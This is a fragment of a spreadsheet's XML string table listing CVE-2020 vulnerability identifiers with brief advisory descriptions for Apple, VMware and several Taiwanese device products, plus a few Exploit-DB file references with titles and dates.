    <t>A memory corruption issue was addressed with improved memory handling. This issue is fixed in macOS Catalina 10.15.3. An application may be able to execute arbitrary code with system privileges.</t>
  </si>
  <si>
    <t>CVE-2020-3846</t>
  </si>
  <si>
    <t>A buffer overflow was addressed with improved size validation. This issue is fixed in iOS 13.3.1 and iPadOS 13.3.1, macOS Catalina 10.15.3, tvOS 13.3.1, watchOS 6.1.2, iTunes for Windows 12.10.4, iCloud for Windows 11.0, iCloud for Windows 7.17. Processing maliciously crafted XML may lead to an unexpected application termination or arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-3847</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Catalina 10.15.3. A remote attacker may be able to leak memory.</t>
  </si>
  <si>
    <t>CVE-2020-3848</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved input validation. This issue is fixed in macOS Catalina 10.15.3. A remote attacker may be able to cause unexpected application termination or arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-3849</t>
  </si>
  <si>
    <t>CVE-2020-3850</t>
  </si>
  <si>
    <t>CVE-2020-3851</t>
  </si>
  <si>
    <t>A use after free issue was addressed with improved memory management. This issue is fixed in macOS Catalina 10.15.4, Security Update 2020-002 Mojave, Security Update 2020-002 High Sierra, macOS Catalina 10.15.3, Security Update 2020-001 Mojave, Security Update 2020-001 High Sierra. An application may be able to gain elevated privileges.</t>
  </si>
  <si>
    <t>CVE-2020-3852</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved validation. This issue is fixed in Safari 13.0.5. A URL scheme may be incorrectly ignored when determining multimedia permission for a website.</t>
  </si>
  <si>
    <t>CVE-2020-3853</t>
  </si>
  <si>
    <t>A type confusion issue was addressed with improved memory handling. This issue is fixed in iOS 13.3.1 and iPadOS 13.3.1, macOS Catalina 10.15.3, tvOS 13.3.1, watchOS 6.1.2. A malicious application may be able to execute arbitrary code with system privileges.</t>
  </si>
  <si>
    <t>CVE-2020-3854</t>
  </si>
  <si>
    <t>CVE-2020-3855</t>
  </si>
  <si>
    <t>An access issue was addressed with improved access restrictions. This issue is fixed in macOS Catalina 10.15.3, Security Update 2020-001 Mojave, Security Update 2020-001 High Sierra. A malicious application may be able to overwrite arbitrary files.</t>
  </si>
  <si>
    <t>CVE-2020-3856</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved input validation. This issue is fixed in iOS 13.3.1 and iPadOS 13.3.1, macOS Catalina 10.15.3, tvOS 13.3.1, watchOS 6.1.2. Processing a maliciously crafted string may lead to heap corruption.</t>
  </si>
  <si>
    <t>CVE-2020-3857</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved memory handling. This issue is fixed in iOS 13.3.1 and iPadOS 13.3.1, macOS Catalina 10.15.3, tvOS 13.3.1, watchOS 6.1.2. An application may be able to execute arbitrary code with system privileges.</t>
  </si>
  <si>
    <t>CVE-2020-3858</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved memory handling. This issue is fixed in iOS 13.3.1 and iPadOS 13.3.1. An application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2020-3859</t>
  </si>
  <si>
    <t>An inconsistent user interface issue was addressed with improved state management. This issue is fixed in iOS 13.3.1 and iPadOS 13.3.1. A person with physical access to an iOS device may be able to access contacts from the lock screen.</t>
  </si>
  <si>
    <t>CVE-2020-3860</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved input validation. This issue is fixed in iOS 13.3.1 and iPadOS 13.3.1, watchOS 6.1.2. An application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2020-3861</t>
  </si>
  <si>
    <t>The issue was addressed with improved permissions logic. This issue is fixed in iTunes for Windows 12.10.4. A user may gain access to protected parts of the file system.</t>
  </si>
  <si>
    <t>CVE-2020-3862</t>
  </si>
  <si>
    <t>A denial of service issue was addressed with improved memory handling. This issue is fixed in iOS 13.3.1 and iPadOS 13.3.1, tvOS 13.3.1, Safari 13.0.5, iTunes for Windows 12.10.4, iCloud for Windows 11.0, iCloud for Windows 7.17. A malicious website may be able to cause a denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-3863</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved memory handling. This issue is fixed in macOS Catalina 10.15.3, Security Update 2020-001 Mojave, Security Update 2020-001 High Sierra. An application may be able to execute arbitrary code with system privileges.</t>
  </si>
  <si>
    <t>CVE-2020-3864</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved validation. This issue is fixed in iCloud for Windows 7.17, iTunes 12.10.4 for Windows, iCloud for Windows 10.9.2, tvOS 13.3.1, Safari 13.0.5, iOS 13.3.1 and iPadOS 13.3.1. A DOM object context may not have had a unique security origin.</t>
  </si>
  <si>
    <t>CVE-2020-3865</t>
  </si>
  <si>
    <t>CVE-2020-3866</t>
  </si>
  <si>
    <t>This was addressed with additional checks by Gatekeeper on files mounted through a network share. This issue is fixed in macOS Catalina 10.15.3. Searching for and opening a file from an attacker controlled NFS mount may bypass Gatekeeper.</t>
  </si>
  <si>
    <t>CVE-2020-3867</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved state management. This issue is fixed in iOS 13.3.1 and iPadOS 13.3.1, tvOS 13.3.1, Safari 13.0.5, iTunes for Windows 12.10.4, iCloud for Windows 11.0, iCloud for Windows 7.17. Processing maliciously crafted web content may lead to universal cross site scripting.</t>
  </si>
  <si>
    <t>CVE-2020-3868</t>
  </si>
  <si>
    <t>CVE-2020-3869</t>
  </si>
  <si>
    <t>An issue existed in the handling of the local user's self-view. The issue was corrected with improved logic. This issue is fixed in iOS 13.3.1 and iPadOS 13.3.1. A remote FaceTime user may be able to cause the local user's camera self-view to display the incorrect camera.</t>
  </si>
  <si>
    <t>CVE-2020-3870</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved input validation. This issue is fixed in iOS 13.3.1 and iPadOS 13.3.1, macOS Catalina 10.15.3, tvOS 13.3.1, watchOS 6.1.2. Processing a maliciously crafted image may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-3871</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved memory handling. This issue is fixed in macOS Catalina 10.15.3. An application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2020-3872</t>
  </si>
  <si>
    <t>A memory initialization issue was addressed with improved memory handling. This issue is fixed in iOS 13.3.1 and iPadOS 13.3.1, macOS Catalina 10.15.3, tvOS 13.3.1, watchOS 6.1.2. An application may be able to read restricted memory.</t>
  </si>
  <si>
    <t>CVE-2020-3873</t>
  </si>
  <si>
    <t>This issue was addressed with improved setting propagation. This issue is fixed in iOS 13.3.1 and iPadOS 13.3.1. Turning off "Load remote content in messages” may not apply to all mail previews.</t>
  </si>
  <si>
    <t>CVE-2020-3874</t>
  </si>
  <si>
    <t>An issued existed in the naming of screenshots. The issue was corrected with improved naming. This issue is fixed in iOS 13.3.1 and iPadOS 13.3.1. Screenshots of the Messages app may reveal additional message content.</t>
  </si>
  <si>
    <t>CVE-2020-3875</t>
  </si>
  <si>
    <t>A validation issue was addressed with improved input sanitization. This issue is fixed in iOS 13.3.1 and iPadOS 13.3.1, macOS Catalina 10.15.3, tvOS 13.3.1, watchOS 6.1.2. An application may be able to read restricted memory.</t>
  </si>
  <si>
    <t>CVE-2020-3877</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Catalina 10.15.3, watchOS 6.1.2. A remote attacker may be able to cause unexpected application termination or arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-3878</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved input validation. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5, iTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows 7.19. Processing a maliciously crafted image may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-3880</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved input validation. This issue is fixed in watchOS 6.1.2, iOS 13.3.1 and iPadOS 13.3.1, tvOS 13.3.1, macOS Catalina 10.15.3, Security Update 2020-001 Mojave, Security Update 2020-001 High Sierra. Processing a maliciously crafted image may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-3881</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved state management. This issue is fixed in macOS Catalina 10.15.4. A local user may be able to view sensitive user information.</t>
  </si>
  <si>
    <t>CVE-2020-3882</t>
  </si>
  <si>
    <t>This issue was addressed with improved checks. This issue is fixed in macOS Catalina 10.15.5. Importing a maliciously crafted calendar invitation may exfiltrate user information.</t>
  </si>
  <si>
    <t>CVE-2020-3883</t>
  </si>
  <si>
    <t>This issue was addressed with improved checks. This issue is fixed in iOS 13.4 and iPadOS 13.4, macOS Catalina 10.15.4, tvOS 13.4, watchOS 6.2. An application may be able to use arbitrary entitlements.</t>
  </si>
  <si>
    <t>CVE-2020-3884</t>
  </si>
  <si>
    <t>An injection issue was addressed with improved validation. This issue is fixed in macOS Catalina 10.15.4. A remote attacker may be able to cause arbitrary javascript code execution.</t>
  </si>
  <si>
    <t>CVE-2020-3885</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved restrictions. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. A file URL may be incorrectly processed.</t>
  </si>
  <si>
    <t>CVE-2020-3886</t>
  </si>
  <si>
    <t>A use after free issue was addressed with improved memory management. This issue is fixed in macOS Catalina 10.15.4, Security Update 2020-002 Mojave, Security Update 2020-002 High Sierra. A malicious application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2020-3887</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved restrictions. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. A download's origin may be incorrectly associated.</t>
  </si>
  <si>
    <t>CVE-2020-3888</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved restrictions. This issue is fixed in iOS 13.4 and iPadOS 13.4. A maliciously crafted page may interfere with other web contexts.</t>
  </si>
  <si>
    <t>CVE-2020-3889</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved state management. This issue is fixed in macOS Catalina 10.15.4. A local user may be able to read arbitrary files.</t>
  </si>
  <si>
    <t>CVE-2020-3890</t>
  </si>
  <si>
    <t>The issue was addressed with improved deletion. This issue is fixed in iOS 13.4 and iPadOS 13.4. Deleted messages groups may still be suggested as an autocompletion.</t>
  </si>
  <si>
    <t>CVE-2020-3891</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved state management. This issue is fixed in iOS 13.4 and iPadOS 13.4, watchOS 6.2. A person with physical access to a locked iOS device may be able to respond to messages even when replies are disabled.</t>
  </si>
  <si>
    <t>CVE-2020-3892</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved input validation. This issue is fixed in macOS Catalina 10.15.4. A malicious application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2020-3893</t>
  </si>
  <si>
    <t>CVE-2020-3894</t>
  </si>
  <si>
    <t>A race condition was addressed with additional validation. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. An application may be able to read restricted memory.</t>
  </si>
  <si>
    <t>CVE-2020-3895</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved memory handling. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, watchOS 6.2, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. Processing maliciously crafted web content may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-3896</t>
  </si>
  <si>
    <t>This issue was addressed by removing the vulnerable code. This issue is fixed in macOS Catalina 10.15.4, Security Update 2020-002 Mojave, Security Update 2020-002 High Sierra. A malicious application may be able to overwrite arbitrary files.</t>
  </si>
  <si>
    <t>CVE-2020-3897</t>
  </si>
  <si>
    <t>A type confusion issue was addressed with improved memory handling. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, watchOS 6.2, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. A remote attacker may be able to cause arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-3898</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved validation. This issue is fixed in macOS Catalina 10.15.4. An application may be able to gain elevated privileges.</t>
  </si>
  <si>
    <t>CVE-2020-3899</t>
  </si>
  <si>
    <t>A memory consumption issue was addressed with improved memory handling. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, watchOS 6.2, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. A remote attacker may be able to cause arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-3900</t>
  </si>
  <si>
    <t>CVE-2020-3901</t>
  </si>
  <si>
    <t>A type confusion issue was addressed with improved memory handling. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, watchOS 6.2, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. Processing maliciously crafted web content may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-3902</t>
  </si>
  <si>
    <t>An input validation issue was addressed with improved input validation. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. Processing maliciously crafted web content may lead to a cross site scripting attack.</t>
  </si>
  <si>
    <t>CVE-2020-3903</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved memory handling. This issue is fixed in macOS Catalina 10.15.4. An application may be able to execute arbitrary code with system privileges.</t>
  </si>
  <si>
    <t>CVE-2020-3904</t>
  </si>
  <si>
    <t>Multiple memory corruption issues were addressed with improved state management. This issue is fixed in macOS Catalina 10.15.4. A malicious application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2020-3905</t>
  </si>
  <si>
    <t>CVE-2020-3906</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved restrictions. This issue is fixed in macOS Catalina 10.15.4. A maliciously crafted application may be able to bypass code signing enforcement.</t>
  </si>
  <si>
    <t>CVE-2020-3907</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Catalina 10.15.4. A local user may be able to cause unexpected system termination or read kernel memory.</t>
  </si>
  <si>
    <t>CVE-2020-3908</t>
  </si>
  <si>
    <t>CVE-2020-3909</t>
  </si>
  <si>
    <t>A buffer overflow was addressed with improved bounds checking. This issue is fixed in iOS 13.4 and iPadOS 13.4, macOS Catalina 10.15.4, tvOS 13.4, watchOS 6.2, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. Multiple issues in libxml2.</t>
  </si>
  <si>
    <t>CVE-2020-3910</t>
  </si>
  <si>
    <t>A buffer overflow was addressed with improved size validation. This issue is fixed in iOS 13.4 and iPadOS 13.4, macOS Catalina 10.15.4, tvOS 13.4, watchOS 6.2, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. Multiple issues in libxml2.</t>
  </si>
  <si>
    <t>CVE-2020-3911</t>
  </si>
  <si>
    <t>CVE-2020-3912</t>
  </si>
  <si>
    <t>CVE-2020-3913</t>
  </si>
  <si>
    <t>A permissions issue existed. This issue was addressed with improved permission validation. This issue is fixed in iOS 13.4 and iPadOS 13.4, macOS Catalina 10.15.4, watchOS 6.2. A malicious application may be able to elevate privileges.</t>
  </si>
  <si>
    <t>CVE-2020-3914</t>
  </si>
  <si>
    <t>A memory initialization issue was addressed with improved memory handling. This issue is fixed in iOS 13.4 and iPadOS 13.4, macOS Catalina 10.15.4, tvOS 13.4, watchOS 6.2. An application may be able to read restricted memory.</t>
  </si>
  <si>
    <t>CVE-2020-3915</t>
  </si>
  <si>
    <t>A path handling issue was addressed with improved validation. This issue is fixed in macOS Catalina 10.15.4. A malicious application may be able to overwrite arbitrary files.</t>
  </si>
  <si>
    <t>CVE-2020-3916</t>
  </si>
  <si>
    <t>An access issue was addressed with additional sandbox restrictions. This issue is fixed in iOS 13.4 and iPadOS 13.4, watchOS 6.2. Setting an alternate app icon may disclose a photo without needing permission to access photos.</t>
  </si>
  <si>
    <t>CVE-2020-3917</t>
  </si>
  <si>
    <t>This issue was addressed with a new entitlement. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, watchOS 6.2. An application may be able to use an SSH client provided by private frameworks.</t>
  </si>
  <si>
    <t>CVE-2020-3918</t>
  </si>
  <si>
    <t>An access issue was addressed with additional sandbox restrictions. This issue is fixed in iOS 13.4 and iPadOS 13.4, macOS Catalina 10.15.4, tvOS 13.4, watchOS 6.2. A local user may be able to view sensitive user information.</t>
  </si>
  <si>
    <t>CVE-2020-3919</t>
  </si>
  <si>
    <t>A memory initialization issue was addressed with improved memory handling. This issue is fixed in iOS 13.4 and iPadOS 13.4, macOS Catalina 10.15.4, tvOS 13.4, watchOS 6.2. A malicious application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2020-3920</t>
  </si>
  <si>
    <t>UltraLog Express device management interface does not properly perform access authentication in some specific pages/functions. Any user can access the privileged page to manage accounts through specific system directory.</t>
  </si>
  <si>
    <t>CVE-2020-3921</t>
  </si>
  <si>
    <t>UltraLog Express device management software stores user’s information in cleartext. Any user can obtain accounts information through a specific page.</t>
  </si>
  <si>
    <t>CVE-2020-3922</t>
  </si>
  <si>
    <t>LisoMail, by ArmorX, allows SQL Injections, attackers can access the database without authentication via a URL parameter manipulation.</t>
  </si>
  <si>
    <t>CVE-2020-3923</t>
  </si>
  <si>
    <t>DVR firmware in TAT-76 and TAT-77 series of products, provided by TONNET, contain misconfigured authentication mechanism. Attackers can crack the default password and gain access to the system.</t>
  </si>
  <si>
    <t>CVE-2020-3924</t>
  </si>
  <si>
    <t>DVR firmware in TAT-76 and TAT-77 series of products, provided by TONNET do not properly verify patch files. Attackers can inject a specific command into a patch file and gain access to the system.</t>
  </si>
  <si>
    <t>CVE-2020-3925</t>
  </si>
  <si>
    <t>A Remote Code Execution(RCE) vulnerability exists in some designated applications in ServiSign security plugin, as long as the interface is captured, attackers are able to launch RCE and executes arbitrary command on target system via malicious crafted scripts.</t>
  </si>
  <si>
    <t>CVE-2020-3926</t>
  </si>
  <si>
    <t>An arbitrary-file-access vulnerability exists in ServiSign security plugin, as long as the attackers learn the specific API function, they may access arbitrary files on target system via crafted API parameter.</t>
  </si>
  <si>
    <t>CVE-2020-3927</t>
  </si>
  <si>
    <t>CVE-2020-3928</t>
  </si>
  <si>
    <t>GeoVision Door Access Control device family is hardcoded with a root password, which adopting an identical password in all devices.</t>
  </si>
  <si>
    <t>CVE-2020-3929</t>
  </si>
  <si>
    <t>GeoVision Door Access Control device family employs shared cryptographic private keys for SSH and HTTPS. Attackers may conduct MITM attack with the derived keys and plaintext recover of encrypted messages.</t>
  </si>
  <si>
    <t>CVE-2020-3930</t>
  </si>
  <si>
    <t>GeoVision Door Access Control device family improperly stores and controls access to system logs, any users can read these logs.</t>
  </si>
  <si>
    <t>CVE-2020-3931</t>
  </si>
  <si>
    <t>Buffer overflow exists in Geovision Door Access Control device family, an unauthenticated remote attacker can execute arbitrary command.</t>
  </si>
  <si>
    <t>CVE-2020-3932</t>
  </si>
  <si>
    <t>A vulnerable SNMP in Draytek VigorAP910C cannot be disabled, which may cause information leakage.</t>
  </si>
  <si>
    <t>CVE-2020-3933</t>
  </si>
  <si>
    <t>TAIWAN SECOM CO., LTD., a Door Access Control and Personnel Attendance Management system, allows attackers to enumerate and exam user account in the system.</t>
  </si>
  <si>
    <t>CVE-2020-3934</t>
  </si>
  <si>
    <t>TAIWAN SECOM CO., LTD., a Door Access Control and Personnel Attendance Management system, contains a vulnerability of Pre-auth SQL Injection, allowing attackers to inject a specific SQL command.</t>
  </si>
  <si>
    <t>CVE-2020-3935</t>
  </si>
  <si>
    <t>TAIWAN SECOM CO., LTD., a Door Access Control and Personnel Attendance Management system, stores users’ information by cleartext in the cookie, which divulges password to attackers.</t>
  </si>
  <si>
    <t>CVE-2020-3936</t>
  </si>
  <si>
    <t>UltraLog Express device management interface does not properly filter user inputted string in some specific parameters, attackers can inject arbitrary SQL command.</t>
  </si>
  <si>
    <t>CVE-2020-3937</t>
  </si>
  <si>
    <t>SQL Injection in SysJust Syuan-Gu-Da-Shih, versions before 20191223, allowing attackers to perform unwanted SQL queries and access arbitrary file in the database.</t>
  </si>
  <si>
    <t>CVE-2020-3938</t>
  </si>
  <si>
    <t>SysJust Syuan-Gu-Da-Shih, versions before 20191223, contain vulnerability of Request Forgery, allowing attackers to launch inquiries into network architecture or system files of the server via forged inquests.</t>
  </si>
  <si>
    <t>CVE-2020-3939</t>
  </si>
  <si>
    <t>SysJust Syuan-Gu-Da-Shih, versions before 20191223, contain vulnerability of Cross-Site Scripting(XSS), personal information may be leaked to attackers via the vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-3940</t>
  </si>
  <si>
    <t>VMware Workspace ONE SDK and dependent mobile application updates address sensitive information disclosure vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-3941</t>
  </si>
  <si>
    <t>The repair operation of VMware Tools for Windows 10.x.y has a race condition which may allow for privilege escalation in the Virtual Machine where Tools is installed. This vulnerability is not present in VMware Tools 11.x.y since the affected functionality is not present in VMware Tools 11.</t>
  </si>
  <si>
    <t>CVE-2020-3943</t>
  </si>
  <si>
    <t>vRealize Operations for Horizon Adapter (6.7.x prior to 6.7.1 and 6.6.x prior to 6.6.1) uses a JMX RMI service which is not securely configured. An unauthenticated remote attacker who has network access to vRealize Operations, with the Horizon Adapter running, may be able to execute arbitrary code in vRealize Operations.</t>
  </si>
  <si>
    <t>CVE-2020-3944</t>
  </si>
  <si>
    <t>vRealize Operations for Horizon Adapter (6.7.x prior to 6.7.1 and 6.6.x prior to 6.6.1) has an improper trust store configuration leading to authentication bypass. An unauthenticated remote attacker who has network access to vRealize Operations, with the Horizon Adapter running, may be able to bypass Adapter authentication.</t>
  </si>
  <si>
    <t>CVE-2020-3945</t>
  </si>
  <si>
    <t>vRealize Operations for Horizon Adapter (6.7.x prior to 6.7.1 and 6.6.x prior to 6.6.1) contains an information disclosure vulnerability due to incorrect pairing implementation between the vRealize Operations for Horizon Adapter and Horizon View. An unauthenticated remote attacker who has network access to vRealize Operations, with the Horizon Adapter running, may obtain sensitive information</t>
  </si>
  <si>
    <t>CVE-2020-3946</t>
  </si>
  <si>
    <t>InstallBuilder AutoUpdate tool and regular installers enabling &lt;checkForUpdates&gt; built with versions earlier than 19.11 are vulnerable to Billion laughs attack (denial-of-service).</t>
  </si>
  <si>
    <t>CVE-2020-3947</t>
  </si>
  <si>
    <t>VMware Workstation (15.x before 15.5.2) and Fusion (11.x before 11.5.2) contain a use-after vulnerability in vmnetdhcp. Successful exploitation of this issue may lead to code execution on the host from the guest or may allow attackers to create a denial-of-service condition of the vmnetdhcp service running on the host machine.</t>
  </si>
  <si>
    <t>CVE-2020-3948</t>
  </si>
  <si>
    <t>Linux Guest VMs running on VMware Workstation (15.x before 15.5.2) and Fusion (11.x before 11.5.2) contain a local privilege escalation vulnerability due to improper file permissions in Cortado Thinprint. Local attackers with non-administrative access to a Linux guest VM with virtual printing enabled may exploit this issue to elevate their privileges to root on the same guest VM.</t>
  </si>
  <si>
    <t>CVE-2020-3950</t>
  </si>
  <si>
    <t>VMware Fusion (11.x before 11.5.2), VMware Remote Console for Mac (11.x and prior before 11.0.1) and Horizon Client for Mac (5.x and prior before 5.4.0) contain a privilege escalation vulnerability due to improper use of setuid binaries. Successful exploitation of this issue may allow attackers with normal user privileges to escalate their privileges to root on the system where Fusion, VMRC or Horizon Client is installed.</t>
  </si>
  <si>
    <t>exploits/macos/local/48235.sh</t>
  </si>
  <si>
    <t>VMware Fusion 11.5.2 - Privilege Escalation</t>
  </si>
  <si>
    <t>2020-03-20</t>
  </si>
  <si>
    <t>CVE-2020-3951</t>
  </si>
  <si>
    <t>VMware Workstation (15.x before 15.5.2) and Horizon Client for Windows (5.x and prior before 5.4.0) contain a denial-of-service vulnerability due to a heap-overflow issue in Cortado Thinprint. Attackers with non-administrative access to a guest VM with virtual printing enabled may exploit this issue to create a denial-of-service condition of the Thinprint service running on the system where Workstation or Horizon Client is installed.</t>
  </si>
  <si>
    <t>CVE-2020-3952</t>
  </si>
  <si>
    <t>Under certain conditions, vmdir that ships with VMware vCenter Server, as part of an embedded or external Platform Services Controller (PSC), does not correctly implement access controls.</t>
  </si>
  <si>
    <t>exploits/multiple/webapps/48535.txt</t>
  </si>
  <si>
    <t>VMware vCenter Server 6.7 - Authentication Bypass</t>
  </si>
  <si>
    <t>2020-06-01</t>
  </si>
  <si>
    <t>CVE-2020-3953</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability exists in VMware vRealize Log Insight prior to 8.1.0 due to improper Input validation.</t>
  </si>
  <si>
    <t>CVE-2020-3954</t>
  </si>
  <si>
    <t>Open Redirect vulnerability exists in VMware vRealize Log Insight prior to 8.1.0 due to improper Input validation.</t>
  </si>
  <si>
    <t>CVE-2020-3955</t>
  </si>
  <si>
    <t>ESXi 6.5 without patch ESXi650-201912104-SG and ESXi 6.7 without patch ESXi670-202004103-SG do not properly neutralize script-related HTML when viewing virtual machines attributes. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.3.</t>
  </si>
  <si>
    <t>CVE-2020-3956</t>
  </si>
  <si>
    <t>VMware Cloud Director 10.0.x before 10.0.0.2, 9.7.0.x before 9.7.0.5, 9.5.0.x before 9.5.0.6, and 9.1.0.x before 9.1.0.4 do not properly handle input leading to a code injection vulnerability. An authenticated actor may be able to send malicious traffic to VMware Cloud Director which may lead to arbitrary remote code execution. This vulnerability can be exploited through the HTML5- and Flex-based UIs, the API Explorer interface and API access.</t>
  </si>
  <si>
    <t>exploits/linux/remote/48540.py</t>
  </si>
  <si>
    <t>vCloud Director 9.7.0.15498291 - Remote Code Execution</t>
  </si>
  <si>
    <t>CVE-2020-3957</t>
  </si>
  <si>
    <t>VMware Fusion (11.x before 11.5.5), VMware Remote Console for Mac (11.x and prior) and VMware Horizon Client for Mac (5.x and prior) contain a local privilege escalation vulnerability due to a Time-of-check Time-of-use (TOCTOU) issue in the service opener. Successful exploitation of this issue may allow attackers with normal user privileges to escalate their privileges to root on the system where Fusion, VMRC and Horizon Client are installed.</t>
  </si>
  <si>
    <t>CVE-2020-3958</t>
  </si>
  <si>
    <t>VMware ESXi (6.7 before ESXi670-202004101-SG and 6.5 before ESXi650-202005401-SG), VMware Workstation (15.x before 15.5.2) and VMware Fusion (11.x before 11.5.2) contain a denial-of-service vulnerability in the shader functionality. Successful exploitation of this issue may allow attackers with non-administrative access to a virtual machine to crash the virtual machine's vmx process leading to a denial of service condition.</t>
  </si>
  <si>
    <t>CVE-2020-3959</t>
  </si>
  <si>
    <t>VMware ESXi (6.7 before ESXi670-202004101-SG and 6.5 before ESXi650-202005401-SG), VMware Workstation (15.x before 15.1.0) and VMware Fusion (11.x before 11.1.0) contain a memory leak vulnerability in the VMCI module. A malicious actor with local non-administrative access to a virtual machine may be able to crash the virtual machine's vmx process leading to a partial denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-3960</t>
  </si>
  <si>
    <t>VMware ESXi (6.7 before ESXi670-202006401-SG and 6.5 before ESXi650-202005401-SG), Workstation (15.x before 15.5.5), and Fusion (11.x before 11.5.5) contain an out-of-bounds read vulnerability in NVMe functionality. A malicious actor with local non-administrative access to a virtual machine with a virtual NVMe controller present may be able to read privileged information contained in physical memory.</t>
  </si>
  <si>
    <t>CVE-2020-3961</t>
  </si>
  <si>
    <t>VMware Horizon Client for Windows (prior to 5.4.3) contains a privilege escalation vulnerability due to folder permission configuration and unsafe loading of libraries. A local user on the system where the software is installed may exploit this issue to run commands as any user.</t>
  </si>
  <si>
    <t>CVE-2020-3962</t>
  </si>
  <si>
    <t>VMware ESXi (7.0 before ESXi_7.0.0-1.20.16321839, 6.7 before ESXi670-202004101-SG and 6.5 before ESXi650-202005401-SG), Workstation (15.x before 15.5.5), and Fusion (11.x before 11.5.5) contain a use-after-free vulnerability in the SVGA device. A malicious actor with local access to a virtual machine with 3D graphics enabled may be able to exploit this vulnerability to execute code on the hypervisor from a virtual machine.</t>
  </si>
  <si>
    <t>CVE-2020-3963</t>
  </si>
  <si>
    <t>VMware ESXi (7.0 before ESXi_7.0.0-1.20.16321839, 6.7 before ESXi670-202006401-SG and 6.5 before ESXi650-202005401-SG), Workstation (15.x before 15.5.2), and Fusion (11.x before 11.5.2) contain a use-after-free vulnerability in PVNVRAM. A malicious actor with local access to a virtual machine may be able to read privileged information contained in physical memory.</t>
  </si>
  <si>
    <t>CVE-2020-3964</t>
  </si>
  <si>
